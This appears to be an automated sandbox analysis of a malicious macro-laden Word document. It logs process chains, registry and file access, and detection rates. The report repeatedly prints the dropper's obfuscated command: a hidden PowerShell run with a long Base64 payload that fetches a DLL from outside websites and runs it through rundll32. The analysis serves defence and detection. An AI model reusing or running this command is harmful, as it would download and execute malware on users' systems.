Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL

Source: Documenten_9274874 8574977265.doc	Virustotal: Detection: 37%
Source: Documenten_9274874 8574977265.doc	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vzmpbxrgkn\sbqrrdzml.sop',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ukzmpnozo\pnpaswzz.stx',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Awonhbftone\yxjcuugtve.ehy',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sbbifaxj\wcgyhcz.btb',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ypmeuqhummj\uoygpjaare.osc',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqivdealrt\nmtqooojq.rit',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzdlyz\nbltd.fbg',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vzmpbxrgkn\sbqrrdzml.sop',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ukzmpnozo\pnpaswzz.stx',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Awonhbftone\yxjcuugtve.ehy',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sbbifaxj\wcgyhcz.btb',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ypmeuqhummj\uoygpjaare.osc',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqivdealrt\nmtqooojq.rit',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzdlyz\nbltd.fbg',Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2109659134.0000000002A10000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2108833274.0000000001E67000.00000004.00000040.sdmp

Source: Documenten_9274874 8574977265.doc

Initial sample: OLE summary subject = Ohio Avon Montenegro Saint Pierre and Miquelon Human Industrial & Shoes Park online Beauty, Kids & Toys users

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: Documenten_9274874 8574977265.doc	Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788			Name: Owppnp8hah4xo788

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAA